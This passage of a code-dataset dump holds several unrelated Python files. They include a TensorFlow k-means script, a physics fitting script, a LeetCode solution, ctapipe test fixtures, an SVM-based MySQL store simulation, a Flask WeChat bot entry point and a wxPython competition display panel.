perm=[2,0,1]), name='op_data_set')\n\n# A simple loop to create an array of images, each offset by 0-2 pixels in height and width.\n# creates a list of 9 tensors each Shape=[3, img_h, img_w].\n# note the original was 2 pixels more in each of the flat dims\nconvarr = []\nfor r in range(3):\n\tfor c in range(3):\n\t\tconvarr.append(t_data[:, r:r+img_h, c:c+img_w])\n\n# stack the array. Shape=[9, 3, img_h, img_w]\nt_stacked = tf.stack(convarr, name='t_stacked')\n# Transpose so the data actually moves i.e. the flat underlying representation has data in a different order.\n# Shape=[img_h, img_w, 9, 3, ]\nt_convs = tf.transpose(t_stacked, perm=[2, 3, 0, 1], name='t_convs')\n# reshape for what we want in the database or query images.\n# shape=[c_num_convs, c_kernel_size]\nt_chunks = tf.reshape(t_convs, [img_h*img_w, c_kernel_size], name='t_chunks')\n# l2 normalize. The squares of each chunk's properties now sum to 1. 
This captures the structure rather than the absolute values\ndb_norm = tf.nn.l2_normalize(t_chunks, dim=1, name='db_norm')\n\n# variable (and stop for call graph) holding the db that knn queries will run against.\n# set by assign from op_db_norm_set\nv_db_norm = tf.Variable(tf.zeros(shape=[c_num_convs*c_num_files_per_batch,c_kernel_size], dtype=tf.float32), name='v_db_norm')\n# place holder for the database, copied in from a numpy array built up from the convs of each image.\nph_db_norm = tf.placeholder(dtype=tf.float32, shape=[c_num_convs*c_num_files_per_batch,c_kernel_size], name='ph_db_norm')\n# op to put placeholder value into database\nop_db_norm_set = tf.assign(v_db_norm, ph_db_norm, name='op_db_norm_set')\n\n# variable for labels\nv_db_labels = tf.Variable(tf.zeros(shape=[c_num_convs*c_num_files_per_batch], dtype=tf.int32), name='v_db_labels')\n# place holder for the labels which are just the classes of the image repeated along all the convs of each image\nph_db_labels = tf.placeholder(dtype=tf.int32, shape=[c_num_convs*c_num_files_per_batch], name='ph_db_labels')\n# op to put placeholder value into database\nop_db_labels_set = tf.assign(v_db_labels, ph_db_labels, name='op_db_labels_set')\n\n# The goal is to cluster the convolution vectors so that we can perform dimension reduction\n# KMeans implementation\n# Initialize the centroid indices. Shape=[num_centroids]\nt_centroids_idxs_init = tf.random_uniform([c_num_centroids], 0, c_num_convs-1, dtype=tf.int32, name='t_centroids_idxs_init')\n# Get the centroids variable ready. Must persist between loops. Shape=[c_num_centroids, c_kernel_size]\nv_centroids = tf.Variable(tf.zeros([c_num_centroids, c_kernel_size], dtype=tf.float32), name='v_centroids')\n# Create actual centroids as seeds. Shape=[num_centroids, c_kernel_size]\nop_centroids_init = tf.assign(v_centroids, tf.gather(v_db_norm, t_centroids_idxs_init, name='op_centroids_init'))\n# Do cosine distances for all centroids on all elements of the db. Shape [c_num_centroids, c_num_convs*c_num_files_per_batch]\nt_all_CDs = tf.matmul(v_centroids, v_db_norm, transpose_b=True, name='t_all_CDs')\n# Do top_k. Shape = [c_num_centroids, c_num_ks]\n## t_best_CDs, t_best_CD_idxs = tf.nn.top_k(t_all_CDs, c_num_ks, sorted=True, name='t_best_CD_idxs')\n# For each element in the matrix, find the centroid that's closest. Shape=[c_num_convs*c_num_files_per_batch]\nv_closest_idxs = tf.Variable(tf.zeros(shape=[c_num_convs*c_num_files_per_batch], dtype=tf.int64), name='v_closest_idxs')\nop_closest_idxs_set = tf.assign(v_closest_idxs, tf.argmax(t_all_CDs, axis=0), name='op_closest_idxs_set')\nl_new_centroids = []\nl_votes_count = []\nfor icent in range(c_num_centroids):\n\t# Create an array of True if the closest index was this centroid\n\t# Shape=[c_num_convs*c_num_files_per_batch]\n\tt_vote_for_this = tf.equal(v_closest_idxs, icent, name='t_vote_for_this')\n\t# Count the number of trues in the vote_for_this tensor\n\t# Shape=()\n\tt_vote_count = tf.reduce_sum(tf.cast(t_vote_for_this, tf.float32), name='t_vote_count')\n\t# Create the cluster. 
Use the True positions to put in the values from the v_db_norm and put zeros elsewhere.\n\t# This means that instead of a short list of the vectors in this cluster we use the full size with zeros for non-members\n\t# Shape=[c_num_convs*c_num_files_per_batch, c_kernel_size]\n\tt_this_cluster = tf.where(t_vote_for_this, v_db_norm, tf.zeros([c_num_convs*c_num_files_per_batch, c_kernel_size]), name='t_this_cluster')\n\t# Sum the values for each property to get the average property\n\t# Shape=[c_kernel_size]\n\tt_cluster_sum = tf.reduce_sum(t_this_cluster, axis=0, name='t_cluster_sum')\n\t# Shape=[c_kernel_size]\n\tt_avg = tf.cond(t_vote_count > 0.0,\n\t\t\t\t\tlambda: tf.divide(t_cluster_sum, t_vote_count),\n\t\t\t\t\tlambda: tf.zeros([c_kernel_size]),\n\t\t\t\t\tname='t_avg')\n\tl_new_centroids.append(t_avg)\n\tl_votes_count.append(t_vote_count)\n# Do random centroids again. This time for filling in\nt_centroids_idxs = tf.random_uniform([c_num_centroids], 0, c_num_convs-1, dtype=tf.int32, name='t_centroids_idxs')\n#Shape = [c_num_centroids, c_kernel_size]\nt_new_centroids = tf.stack(l_new_centroids, name='t_new_centroids')\n# First time around I forgot that I must normalize the centroids as required for spherical k-means. Avg, as above, will not produce a normalized result\nt_new_centroids_norm = tf.nn.l2_normalize(t_new_centroids, dim=1, name='t_new_centroids_norm')\n#Shape=[c_num_centroids]\nt_votes_count = tf.stack(l_votes_count, name='t_votes_count')\n# take the new random idxs and gather new centroids from the db. Only used in case count == 0. Shape=[num_centroids, c_kernel_size]\nt_centroids_from_idxs = tf.gather(v_db_norm, t_centroids_idxs, name='t_centroids_from_idxs')\n# Assign back to the original v_centroids so that we can go for another round\nop_centroids_update = tf.assign(v_centroids, tf.where(tf.greater(t_votes_count, 0.0), t_new_centroids_norm,\n\t\t\t\t\t\t\t\t\t\t\t t_centroids_from_idxs, name='centroids_where'),\n\t\t\t\t\t\t\t\tname='op_centroids_update')\n\n# The following section of code is designed to evaluate the cluster quality, specifically the average distance of a conv fragment from\n# its centroid.\n# v_closest_idxs is an index for each element in the database, specifying which cluster it belongs to. So we use that to\n# replicate the centroid of that cluster to the locations aligned with each member of the database\n# Shape=[c_num_convs*c_num_files_per_batch, c_kernel_size]\nt_centroid_broadcast = tf.gather(v_centroids, v_closest_idxs, name='t_centroid_broadcast')\n# element-wise multiplication of each property and the sum down the properties. It is really just a CD but we aren't using matmul\n# Shape=[c_num_convs*c_num_files_per_batch]\nt_cent_dist = tf.reduce_sum(tf.multiply(v_db_norm, t_centroid_broadcast), axis=1, name='t_cent_dist')\n# Extract a single number representing the kmeans error. This is the mean of the distances from closest centers. 
Shape=()\nt_kmeans_err = tf.reduce_mean(t_cent_dist, name='t_kmeans_err')\nt_sumsq_centroids = tf.reduce_sum(tf.square(v_centroids), axis=1)\n\n\n\nsess = tf.Session(config=tf.ConfigProto(log_device_placement=True))\n# sess = tf.Session()\nmerged = tf.summary.merge_all()\nsummaries_dir = '/tmp'\ntrain_writer = tf.summary.FileWriter(summaries_dir + '/train',\n sess.graph)\n\nsess.run(tf.global_variables_initializer())\n# sess = tf_debug.LocalCLIDebugWrapperSession(sess, ui_type=\"curses\")\n\n# qtrings, qclass = get_file_strings(1)\n# sess.run(op_data_set, feed_dict={ph_image_string: qtrings[0]})\n# r_convs, r_data, r_stacked, r_chunks = sess.run([t_convs, t_data, t_stacked, t_chunks])\n\nstrings, classes = get_file_strings(c_num_files_per_batch)\ndb_els = np.zeros([c_num_convs*c_num_files_per_batch, c_kernel_size], dtype=np.float32)\ndb_labels = np.repeat(classes, c_num_convs)\nfor ibatch in range(c_num_files_per_batch):\n\tsess.run(op_data_set, feed_dict={ph_image_string:strings[ibatch]})\n\tdb_els[ibatch*c_num_convs:(ibatch+1)*c_num_convs] = sess.run(db_norm)\n\tif (ibatch % (c_num_files_per_batch / 100) == 0):\n\t\tprint('num files in db:', ibatch)\n\nsess.run(op_db_norm_set, feed_dict={ph_db_norm:db_els })\nsess.run(op_db_labels_set, feed_dict={ph_db_labels:db_labels })\n\nprint('db created.')\n\n# start by creating random centroids\nsess.run(op_centroids_init)\nr_sumsq_centroids = sess.run(t_sumsq_centroids)\n# calculate the closest centroid for each db record\nsess.run(op_closest_idxs_set)\nprint('r_votes_count =', sess.run(t_votes_count))\nprint('r_kmeans_err =', sess.run(t_kmeans_err))\nfor ikmeans in range(30):\n\tprint('run num:', ikmeans)\n\tr_centroids = sess.run(op_centroids_update)\n\tr_sumsq_centroids = sess.run(t_sumsq_centroids)\n\tprint('r_votes_count =', sess.run(t_votes_count))\n\tprint('r_kmeans_err =', sess.run(t_kmeans_err))\n\tsess.run(op_closest_idxs_set)\n\n# TBD!!!\n# Implement testing of cluster\n\n# np_image = sess.run(image)\n#\n# plt.figure()\n# plt.imshow(np_image.astype(np.uint8))\n# plt.suptitle(ffn, fontsize=14, fontweight='bold')\n# # plt.axis('off')\n# plt.show()\n\nprint('done!')","sub_path":"convknn.py","file_name":"convknn.py","file_ext":"py","file_size_in_byte":11669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"172394738","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom scipy.optimize import least_squares\nimport sys\n\ndef Tanh(z, n0, z0, w):\n return 0.5 * n0 * ( 1. - np.tanh( ( z - z0 ) / w ) )\n\ndef cyl(p, x, z):\n return ( pow(x-p[0], 2.) + pow(z-p[1], 2.) 
- p[2])\n\ncapLen=115.\ntStart=int(sys.argv[1])\ntEnd=int(sys.argv[2])\ntFileStart=int(sys.argv[3])\ntDiff=200\ndt=0.01\nnElem=int((tEnd-tStart)/tDiff)+1\ntime=np.linspace(tStart,tEnd, nElem)\ntDiff=200\n\n# obtain radii and other parameters\ncapRad=5.\noffSet=1.\nradStart=0.\nradEnd=capRad+offSet\ndr=0.5\nr = np.arange( radStart + 0.5 * dr, radEnd + 0.5*dr, dr) # obtain r\n\nzStart=0\nzEnd=capLen\ndz=1.0\nzBins= int( (zEnd - zStart) / dz )\n\nz = np.arange( zStart + 0.5 * dz, zEnd + 0.5*dz, dz ) # obtain z\n\ndA=2.*np.pi*r*dr # area of a circular element\ndV=dA*dz # differential volume element\n\nzBins=z.shape[0] # number of zbins\nrBins=r.shape[0] # number of rbins\n\nrInt = np.zeros((rBins,1))\nzInt = np.zeros((rBins,1))\n\n#print( dr, dz, rBins, zBins, rho.shape )\nnElem=int((tEnd-tStart)/tDiff)+1\n\nmeniscusPosition=np.zeros((nElem,rBins))\n\ntimeCount=int((tStart-tFileStart)/tDiff)\ncounter=0\nfor time in np.arange(tStart, tEnd+tDiff, tDiff):\n\n    dat=np.loadtxt('./postProcessed/density/density_vs_time_'+str(timeCount)+'.dat') \n\n    N_rz=dat # N(r,z) as a function of time\n    rho=N_rz/dV # number density = Number / volume\n\n    count=0 # reset count to 0\n    for i in np.arange(0, rBins, 1):\n\n        popt, pcov = curve_fit(Tanh, z, rho[:,i], bounds=([5,0.,0.], [7., capLen, 1.5]), maxfev=1000)\n\n        rInt[count] = r[i] # Note: I do not reset rInt, zInt because they are overwritten during this operation\n        zInt[count] = popt[1]\n        \n        count += 1\n\n    meniscusPosition[counter,:]=zInt.ravel()\n    timeCount += 1\n    counter += 1\n\nnp.savetxt('./postProcessed/interface_vs_time.dat',meniscusPosition)\n","sub_path":"analysisScripts/imbibition/binaryFluids/findMeniscus.py","file_name":"findMeniscus.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"481878937","text":"#!/usr/bin/env python\n# coding=utf-8\n#\n# Author: Lucas\n# Date: 2019-08-04 17:25:48\n\n\nclass Solution:\n    def findComplement(self, num: int) -> int:\n        mask = 1\n        while mask < num:\n            mask = (mask << 1) + 1\n        # print(mask)\n        return mask ^ num\n","sub_path":"401-500/476_NumberComplement/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"546781768","text":"\"\"\"\ncommon pytest fixtures for tests in ctapipe\n\"\"\"\n\nimport pytest\n\nfrom copy import deepcopy\n\nfrom ctapipe.io import SimTelEventSource\nfrom ctapipe.utils import get_dataset_path\nfrom ctapipe.instrument import CameraGeometry\n\n\n@pytest.fixture(scope=\"session\")\ndef camera_geometries():\n    return [\n        CameraGeometry.from_name(name)\n        for name in [\"LSTCam\", \"NectarCam\", \"CHEC\", \"FlashCam\", \"MAGICCam\"]\n    ]\n\n\n@pytest.fixture(scope=\"session\")\ndef _global_example_event():\n    \"\"\"\n    helper to get a single event from a MC file. 
Don't use this fixture\n    directly, rather use `test_event`\n    \"\"\"\n    filename = get_dataset_path(\"gamma_test_large.simtel.gz\")\n\n    print(\"******************** LOAD TEST EVENT ***********************\")\n\n    with SimTelEventSource(input_url=filename) as reader:\n        event = next(iter(reader))\n\n    return event\n\n\n@pytest.fixture(scope=\"session\")\ndef example_subarray():\n    \"\"\"\n    Subarray corresponding to the example event\n    \"\"\"\n    filename = get_dataset_path(\"gamma_test_large.simtel.gz\")\n\n    print(\"******************** LOAD TEST EVENT ***********************\")\n\n    with SimTelEventSource(input_url=filename) as reader:\n        return reader.subarray\n\n\n@pytest.fixture(scope=\"function\")\ndef example_event(_global_example_event):\n    \"\"\"\n    Use this fixture anywhere you need a test event read from a MC file. For\n    example:\n\n    .. code-block::\n        def test_my_thing(test_event):\n            assert len(test_event.r0.tel) > 0\n\n    \"\"\"\n    return deepcopy(_global_example_event)\n\n\n@pytest.fixture(scope=\"session\")\ndef _subarray_and_event_gamma_off_axis_500_gev():\n    from ctapipe.calib import CameraCalibrator\n    from ctapipe.image import ImageProcessor\n\n    path = get_dataset_path(\"lst_prod3_calibration_and_mcphotons.simtel.zst\")\n\n    with SimTelEventSource(path) as source:\n        it = iter(source)\n        # we want the second event, first event is a corner clipper\n        next(it)\n        event = next(it)\n\n        # make dl1a available\n        calib = CameraCalibrator(source.subarray)\n        calib(event)\n\n        image_processor = ImageProcessor(\n            source.subarray, is_simulation=source.is_simulation\n        )\n\n        # make dl1b available\n        image_processor(event)\n        return source.subarray, event\n\n\n@pytest.fixture(scope=\"function\")\ndef subarray_and_event_gamma_off_axis_500_gev(\n    _subarray_and_event_gamma_off_axis_500_gev\n):\n    \"\"\"\n    A four LST subarray event with a nice shower, well suited to test\n    reconstruction algorithms.\n\n    This event should be very well reconstructible, as we have four LSTs with\n    bright events.\n\n    The event is already calibrated and image parameters have been calculated.\n\n    You can safely mutate the event or subarray in a test as each test\n    gets a fresh copy.\n    \"\"\"\n    subarray, event = _subarray_and_event_gamma_off_axis_500_gev\n    return deepcopy(subarray), deepcopy(event)\n\n\n@pytest.fixture(scope=\"session\")\ndef prod5_gamma_simtel_path():\n    return get_dataset_path(\n        \"gamma_20deg_0deg_run2___cta-prod5-paranal_desert-2147m-Paranal-dark_cone10-100evts.simtel.zst\"\n    )\n\n\n@pytest.fixture(scope=\"session\")\ndef prod5_proton_simtel_path():\n    return get_dataset_path(\n        \"proton_20deg_0deg_run4___cta-prod5-paranal_desert-2147m-Paranal-dark-100evts.simtel.zst\"\n    )\n","sub_path":"ctapipe/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"169328102","text":"import mysql.connector\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\n\ndiret = \"C:/Users/sucod/OneDrive/Lenovo/Documentos/Sql/\"\n\n#-----------------------------------------------\n#--------- Configure the SVM machine -----------\n\ndf = pd.DataFrame(columns = [], index = [])\ndf2 = pd.DataFrame(columns = [], index = [])\n\n#--For the data collected with profits ranging from 0 to 390%\nfor percent in range (0,391,10):\n    df_aux = pd.read_csv(r\"{}\".format(diret)+\"/CSVLoja3/produto_{}.csv\".format(percent))\n    df_aux[\"lucroPercent\"] = percent\n    df = 
pd.concat([df, df_aux],ignore_index=True)\n\nfor percent in range (0,391,10): \n    df_aux = pd.read_csv(r\"{}\".format(diret)+\"/CSVLoja3/aquisicao_{}.csv\".format(percent))\n    for ID in range (1,251):\n        count = 0\n        for prodID in df_aux[\"Produto_idProduto\"]:\n            if prodID == ID:\n                count+=1\n        if count == 0:\n            nova_linha = {'Produto_idProduto':ID, 'Quantidade':0} \n            df_aux = df_aux.append(nova_linha,ignore_index=True)\n\n    df_aux = df_aux.groupby(\"Produto_idProduto\").mean() \n    df2 = pd.concat([df2, df_aux[\"Quantidade\"]],ignore_index=True)\n    \ndel df['Unnamed: 0']\ndel df['idProduto'] \ndel df['prodEstoque']\ndel df['Departamento_idDepartamento']\n\ndf[\"aquiMed\"] = df2.to_numpy()\ndf_produto = df\n\n# The learning target variable will be the intersection of a profit greater than 5000 with sales\n# greater than 500. Therefore, both conditions simultaneously will be the target:\ndf_produto[\"isLucro\"]=(df_produto[\"prodLucro\"]>5000)&(df_produto[\"prodVendas\"]>500)\n\nX = df.drop(['isLucro','prodGanhoAcum','prodVendas','prodCustoAcum','prodValor','prodGanhoAcum','prodLucro'], axis = 1)\nY = df['isLucro']\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.3)\nmodel = SVC(C = 1000, gamma = 0.001, kernel = 'rbf') #optimized parameters\nmodel.fit(X_train, Y_train)\n\ndef max_lucro_min_aq(varcusto):\n    \"\"\" Determines the maximum predefined profit with the minimum accumulated cost per\n    product stock. The argument is the product's acquisition cost.\n    Since both conditions must be satisfied simultaneously, the search\n    can start from the highest profit, and the minimum cost will be\n    contained\"\"\"\n    \n    x = 390\n    while x>1:\n        aqui = 1\n        while aqui<150:\n            cond = model.predict(pd.DataFrame(data={'prodCusto': [varcusto], 'lucroPercent': [x], 'aquiMed': [aqui]}))[0]\n            if cond!=False: #The model's precision was higher at detecting false (non-profit) cases than true ones\n                return [x,aqui]\n                break\n            aqui+=1\n        x-=1\n    if x == 1:\n        return [1,1]\n\n\n#--------------------------------------------------\n#--- Start the store ---\n    \nmydb = mysql.connector.connect(\n    host=\"localhost\",\n    user=\"root\",\n    password=\"1234\",\n    database = \"lojasimples\"\n)\nmycursor = mydb.cursor(buffered=True)\nnp.random.seed(101)\n\ndef lucro(var_val):\n    \"\"\" Legacy function that determines the profit according to the curve fit\"\"\"\n    \n    return 5280.186/(var_val + 2.076)-100.932\n\ndef limpa_base(true_or_false = False):\n    \"\"\"Resets the database\"\"\"\n    \n    if true_or_false:\n        \n        sql = \"DELETE FROM venda\"\n        mycursor.execute(sql)\n        sql = \"DELETE FROM cliente\"\n        mycursor.execute(sql)\n        sql = \"DELETE FROM aquisicao\"\n        mycursor.execute(sql)\n        sql = \"DELETE FROM produto\"\n        mycursor.execute(sql)\n        sql = \"DELETE FROM departamento\"\n        mycursor.execute(sql)\n        \n        sql = \"ALTER TABLE aquisicao AUTO_INCREMENT = 1\"\n        mycursor.execute(sql)\n        sql = \"ALTER TABLE cliente AUTO_INCREMENT = 1\"\n        mycursor.execute(sql)\n        sql = \"ALTER TABLE venda AUTO_INCREMENT = 1\"\n        mycursor.execute(sql)\n        sql = \"ALTER TABLE departamento AUTO_INCREMENT = 1\"\n        mycursor.execute(sql)\n        sql = \"ALTER TABLE produto AUTO_INCREMENT = 1\"\n        mycursor.execute(sql)\nlist_aq = []\ndef configura_loja():\n    \"\"\"Defines the store parameters\"\"\"\n    \n    #-------------------------------------------\n    # 1 - Insert the clients into the database\n    \n    while(1):\n        ins = \"INSERT INTO cliente (salarioCliente) VALUES({})\".format(np.round(np.random.rand()*1000+500,2))\n        val = (\"\")\n        mycursor.execute(ins, val)\n        mydb.commit()\n        
mycursor.execute(\"SELECT * FROM cliente\")\n        \n        res = mycursor.fetchall()\n        \n        if len(res)>=50:\n            break\n        \n    #-------------------------------------------\n    #2 - Insert the store departments\n    \n    for x in range(1,16):\n        ins = \"INSERT INTO departamento () VALUES()\"\n        val = (\"\")\n        mycursor.execute(ins, val)\n        mydb.commit()\n    \n    #-------------------------------------------\n    #3 - Insert the products into stock\n    \n    for x in range(1,251):#251\n        custo = np.round(np.random.rand()*50+1,2)\n        valor = custo*(1+(max_lucro_min_aq(custo))[0]/100)\n        estoque = (max_lucro_min_aq(custo))[1]\n        list_aq.append([x,estoque])\n        ins = \"INSERT INTO produto (prodCusto, prodValor, prodEstoque, Departamento_idDepartamento)\\\n        VALUES({:.2f},{:.2f},{},{})\".format(custo, valor, estoque+20, np.random.randint(1,16))\n        mycursor.execute(ins)\n        mydb.commit()\n    \n    #--------------------------------------------\n    #Export the list with the percentage profits that should be applied to each product\n    #Preferable in order to improve transaction performance.\n    \n    pd.DataFrame(list_aq).to_csv(r'C:\\Users\\sucod\\OneDrive\\Lenovo\\Documentos\\Sql\\CSVLojaSVM3\\list_aq.csv')","sub_path":"Análise_de_Dados_com_MySQL_e_Python/2_SVM/start_loja_db_SVM3.py","file_name":"start_loja_db_SVM3.py","file_ext":"py","file_size_in_byte":5771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"409225172","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# main.py\n# @Author : simon (simonjoe246@gmail.com)\n# @Link : https://simonjoe246.github.io/\n# @Date : 9/5/2018, 9:55:22 AM\n\nfrom flask import Flask\nfrom robot import myrobot\nfrom werobot.contrib.flask import 
make_view\n\napp = Flask(__name__)\n\napp.add_url_rule(rule='/',  # add the route\n                 endpoint='werobot',  # the Flask endpoint\n                 view_func=make_view(myrobot),  # build a Flask view from the BaseRobot\n                 methods=['GET', 'POST'])\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0',\n            port='9000')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"89282018","text":"import wx, sys, os\nsys.path.append('..')\nfrom ..Colors import *\nfrom RanksPanel import *\nfrom InspectionsPanel import *\nfrom ..data import *\nfrom ..EventData import *\nfrom ..drawables import *\nfrom MatchesPanel import *\nclass MainScreen(wx.Panel):\n    def __init__(self,parent):\n        wx.Panel.__init__(self,parent)\n        self.SetSize((1920,1080))\n        self.SetBackgroundColour(COLORS[\"vexRed\"])\n        self.mainPanel = None\n        self.secondPanel = None\n\n        self.smallLogoPic = None\n        self.logoTimer = None\n        self.logoRect = None\n\n        self.vexSmallLogo = None\n        \n        self.mainPanelHeader = None\n        self.secondPanelHeader = None\n\n        self.Font_NotoSans_22_Normal = None\n        self.Font_NotoSans_22_Bold = None\n\n        self.inspectionsToMatchTimer = None\n        \n        genFonts()\n        #self.SetBackgroundColour(COLORS[\"Black\"])\n    def onReady(self,mainPanel = \"Rankings\", secondPanel = \"Matches\", showInspections=False,scrollSpeed=270):\n        self.mainPanelType = mainPanel\n        self.secondPanelType = secondPanel\n        self.showInspections = showInspections\n        self.scrollSpeed = scrollSpeed\n\n        ###SETUP FONTS AND HEADERS###\n        if os.name == 'nt':\n            self.Font_NotoSans_22_Normal = wx.Font(22,wx.DEFAULT,wx.NORMAL,wx.NORMAL,faceName=\"Noto Sans\")\n            self.Font_NotoSans_22_Bold = wx.Font(22,wx.DEFAULT,wx.NORMAL,wx.BOLD,faceName=\"Noto Sans\")\n\n            self.Font_NotoSans_28_Bold = wx.Font(28,wx.DEFAULT,wx.NORMAL,wx.BOLD,faceName=\"Noto Sans\")\n\n            self.Font_NotoSans_36_Normal = wx.Font(36,wx.DEFAULT,wx.NORMAL,wx.NORMAL,faceName=\"Noto Sans\")\n            self.Font_NotoSans_36_Bold = wx.Font(36,wx.DEFAULT,wx.NORMAL,wx.BOLD,faceName=\"Noto Sans\")\n\n            self.Font_NotoSans_55_Normal = wx.Font(55,wx.DEFAULT,wx.NORMAL,wx.NORMAL,faceName=\"Noto Sans\")\n            self.Font_NotoSans_55_Bold = wx.Font(55,wx.DEFAULT,wx.NORMAL,wx.BOLD,faceName=\"Noto Sans\")\n        else:\n            self.Font_NotoSans_22_Normal = wx.Font(22,wx.DEFAULT,wx.NORMAL,wx.NORMAL,faceName=\"NotoSans\")\n            self.Font_NotoSans_22_Bold = wx.Font(22,wx.DEFAULT,wx.NORMAL,wx.BOLD,faceName=\"NotoSans\")\n\n            self.Font_NotoSans_36_Normal = wx.Font(36,wx.DEFAULT,wx.NORMAL,wx.NORMAL,faceName=\"NotoSans\")\n            self.Font_NotoSans_36_Bold = wx.Font(36,wx.DEFAULT,wx.NORMAL,wx.BOLD,faceName=\"NotoSans\")\n\n            self.Font_NotoSans_55_Normal = wx.Font(55,wx.DEFAULT,wx.NORMAL,wx.NORMAL,faceName=\"NotoSans\")\n            self.Font_NotoSans_55_Bold = wx.Font(55,wx.DEFAULT,wx.NORMAL,wx.BOLD,faceName=\"NotoSans\")\n            self.Font_NotoSans_28_Bold = wx.Font(28,wx.DEFAULT,wx.NORMAL,wx.BOLD,faceName=\"NotoSans\")\n        \n        self.mainPanelHeader = Header(self,-1,\"Qualification Rankings\",self.Font_NotoSans_36_Bold,COLORS[\"White\"])\n        self.mainPanelHeader.SetSize((830,150))\n\n        \n        #Check if inspections are needed\n        if self.showInspections:\n            self.secondPanel = None\n            self.mainPanel = InspectionsPanel(self)\n            self.mainPanelHeader.SetFont(self.Font_NotoSans_55_Bold)\n            self.mainPanelHeader.SetLabel(EVENT_DATA.getDivisionName() + \" Inspections\")\n            self.mainPanelHeader.SetPosition((250,12))\n            self.SetBackgroundColour(COLORS[\"vexTxtDarkGray\"])\n            if self.inspectionsToMatchTimer != None:\n                if 
self.inspectionsToMatchTimer.IsRunning():\n self.inspectionsToMatchTimer.Stop()\n self.inspectionsToMatchTimer.Destroy()\n self.inspectionsToMatchTimer = wx.Timer(self,-1)\n self.Bind(wx.EVT_TIMER,self.checkInspectionData,self.inspectionsToMatchTimer)\n self.inspectionsToMatchTimer.Start(1000)\n #self.mainPanel.SetDoubleBuffered(True)\n else:\n self.setupMainPanel()\n self.setupSecondPanel()\n #########\n\n\n self.vexSmallLogo = wx.StaticBitmap(self,-1,wx.BitmapFromImage(wx.Image(os.path.join(os.getcwd(),\"Resources\",\"Images\",\"Display\",\"vrc_logo_titlebar.png\"),wx.BITMAP_TYPE_PNG)))\n self.vexSmallLogo.SetPosition((self.GetSize()[0]-227,25))\n ###show panels###\n if self.mainPanel != None:\n self.mainPanel.Show() \n \n if self.secondPanel != None:\n self.secondPanel.Show()\n def setupMainPanel(self):\n if self.mainPanelType == \"Rankings\":\n self.mainPanel = RanksPanel(self,speed=self.scrollSpeed)\n self.mainPanelHeader.SetFont(self.Font_NotoSans_28_Bold)\n self.mainPanelHeader.SetLabel(EVENT_DATA.getDivisionName() + \" Qualification Rankings\")\n if os.name == 'nt':\n self.mainPanelHeader.SetSize((1200,self.mainPanelHeader.GetSize()[1]))\n \n #self.mainPanelHeader.SetPosition((10,70))\n self.mainPanelHeader.SetExtraStyle(wx.ALIGN_CENTRE_HORIZONTAL)\n self.mainPanelHeader.SetPosition((self.mainPanelHeader.GetPosition()[0],70))\n else:\n self.mainPanelHeader.SetPosition((10+((1200-self.mainPanelHeader.GetSize()[0])/2),70))\n self.mainPanel.SetSize((1200,900))\n self.mainPanel.SetPosition((10,160))\n self.mainPanel.SetBackgroundColour(COLORS[\"vexBlue\"])\n \n def setupSecondPanel(self):\n if self.secondPanelType == \"Matches\":\n self.secondPanelHeader = Header(self,-1,\"Match Schedule and Results\",self.Font_NotoSans_28_Bold,COLORS[\"White\"])\n self.secondPanelHeader.SetPosition((1225+(685-self.secondPanelHeader.GetSize()[0])/2,205))\n self.secondPanel = MatchesPanel(self)\n self.secondPanel.SetPosition((1225,252))\n self.secondPanel.SetSize((685,808))\n self.secondPanel.SetBackgroundColour(COLORS[\"White\"])\n self.secondPanel.Refresh()\n if not self.secondPanel.IsShown():\n self.secondPanel.Show()\n def checkInspectionData(self,evt):\n switchMain = True\n if self.mainPanel != None and self.showInspections:\n if len(EVENT_DATA.matches) > 0:\n for team in EVENT_DATA.teams:\n for match in EVENT_DATA.matches:\n if team == EVENT_DATA.matches[match].getRed1() or team == EVENT_DATA.matches[match].getRed2() or team == EVENT_DATA.matches[match].getRed3() or team == EVENT_DATA.matches[match].getBlue1() or team == EVENT_DATA.matches[match].getBlue2() or team == EVENT_DATA.matches[match].getBlue3():\n EVENT_DATA.teams[team].setIsCompeting(True)\n if EVENT_DATA.teams[team].getIsCompeting() != True or EVENT_DATA.teams[team].getInspectionStatus() != \"Completed\":\n switchMain = False\n \n if switchMain:\n self.mainPanel.Hide()\n self.mainPanel.DestroyChildren()\n self.mainPanel.Destroy()\n if self.secondPanel != None:\n self.secondPanel.Hide()\n self.secondPanel.DestroyChildren()\n self.secondPanel.Destroy()\n if self.inspectionsToMatchTimer != None:\n self.inspectionsToMatchTimer.Stop()\n self.setupMainPanel()\n self.setupSecondPanel()\n self.SetBackgroundColour(COLORS[\"vexRed\"])\n self.Refresh()\n \n if evt != None:\n evt.Skip()","sub_path":"VEXDisplay/Classes/panels/MainScreen.py","file_name":"MainScreen.py","file_ext":"py","file_size_in_byte":7440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"383844916","text":"HEADERS_LIST = 
